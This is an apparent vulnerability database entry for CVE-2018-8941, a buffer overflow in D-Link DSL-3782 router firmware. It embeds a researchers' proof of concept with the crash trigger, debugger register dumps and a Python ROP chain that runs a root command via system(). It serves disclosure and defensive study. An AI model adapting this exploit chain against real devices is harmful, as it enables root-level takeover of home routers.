Vulnerabilities > CVE-2018-8941 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in D-Link Dsl-3782 Firmware 1.01
Attack vector
NETWORK Attack complexity
LOW Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Diagnostics functionality on D-Link DSL-3782 devices with firmware EU v. 1.01 has a buffer overflow, allowing authenticated remote attackers to execute arbitrary code via a long Addr value to the 'set Diagnostics_Entry' function in an HTTP request, related to /userfs/bin/tcapi.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 1 | |
| Hardware | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Overflow Buffers Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
- Client-side Injection-induced Buffer Overflow This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
- Filter Failure through Buffer Overflow In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
- MIME Conversion An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.
Seebug
| bulletinFamily | exploit |
| description | ## CVE-2018-8941: D-Link DSL-3782 Code execution (Proof of Concept) Adam Simuntis :: https://twitter.com/adamsimuntis Mindaugas Slusnys :: https://twitter.com/mislusnys <br /><br /> The buffer overflow vulnerability was found in the "/userfs/bin/tcapi" binary which is used as a wrapper for the "Diagnostics" functionality in the Web GUI. An authenticated user can pass a long buffer as an 'Addr' parameter to the '/user/bin/tcapi' binary using 'set Diagnostics_Entry' function and cause the memory corruption. Furthermore, it is possible to redirect the flow of the program and execute an arbitrary code. ``` adam@expdev ~ $ file userfs/bin/tcapi userfs/bin/tcapi: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped ``` The vulnerability can be triggered as follows: ``` adam@expdev ~ $ sudo chroot . ./qemu-mips-static userfs/bin/tcapi set unset get show commit save read readAll staticGet adam@expdev ~ $ sudo chroot . ./qemu-mips-static userfs/bin/tcapi set set <node_name attr value> adam@expdev ~ $ sudo chroot . ./qemu-mips-static -g 12345 bin/tcapi set Diagnostics_Entry Addr `perl -e 'print "A"x596 . "BBBB"'` ⏎ adam@expdev ~ $ gdb-multiarch gdb-peda$ set arch mips The target architecture is assumed to be mips gdb-peda$ set endian big The target is assumed to be big endian gdb-peda$ target remote localhost:12345 Remote debugging using localhost:12345 Warning: not running or target is remote 0x409a7e76 in ?? () gdb-peda$ c Continuing. Program received signal SIGSEGV, Segmentation fault. Warning: not running or target is remote 0x42424242 in ?? () gdb-peda$ i r zero at v0 v1 a0 a1 a2 a3 R0 00000000 f8ffffff fdffffff 00b07176 05000000 98edff76 11000000 00000000 t0 t1 t2 t3 t4 t5 t6 t7 R8 906d7976 8c837e76 8c837e76 00907f76 00907f76 00907f76 18000000 205e7d76 s0 s1 s2 s3 s4 s5 s6 s7 R16 41414141 41414141 41414141 41414141 05000000 f0064000 20094000 00000000 t8 t9 k0 k1 gp sp s8 ra R24 21000000 50697276 00000000 00000000 50e67e76 d8f0ff76 00000000 42424242 sr lo hi bad cause pc 10000020 5f1a0000 fc010000 42424242 00000000 42424242 fsr fir 00000000 00937300 ``` We have a full control over the return address along with a few other registers. Full ROP chain used to execute 'system("reboot");' as root user can be crafted as follows: (ASLR has been disabled for testing purposes.) ```python import struct # since we are exploiting through the WEB GUI, binary process mappings (/proc/`pidof boa`/maps) were obtained from '/userfs/bin/boa' binary libc_base = 0x2b02b000 # 0x59bb0, offset to system(), big endian libc_system = struct.pack(">I",libc_base+0x59bb0) rop_pad = 'A'*580 # 3rd: Jump to system() from libC, $a0 contains argument s0 = libc_system # 2nd: Load stored command from $a1 to $a0 then jump to next gadget at $s0 -> system(cmd) #.text:00041980 move $a0, $a1 #.text:00041984 li $a2, 0xC #.text:00041988 move $t9, $s0 #.text:0004198C jalr $t9 ; memset s1 = struct.pack(">I",libc_base+0x41980) s2 = 'BBBB' s3 = 'CCCC' # 1st: Load command stored on the stack at ($sp+0x168) to $a1 then jump to next gadget at $s1 ^ #.text:0000C654 addiu $a1, $sp, 0x168+var_150 #.text:0000C658 move $t9, $s1 #.text:0000C65C jalr $t9 ; stat64 ra = struct.pack(">I",libc_base+0xC654) payload = rop_pad + s0 + s1 + s2 + s3 + ra + "reboot;"*10 ``` Successful exploitation will execute 'system("reboot;")' as root user, causig the device to restart. |
| id | SSV:97212 |
| last seen | 2018-04-04 |
| modified | 2018-04-04 |
| published | 2018-04-04 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-97212 |
| title | D-Link DSL-3782 Code execution(CVE-2018-8941) |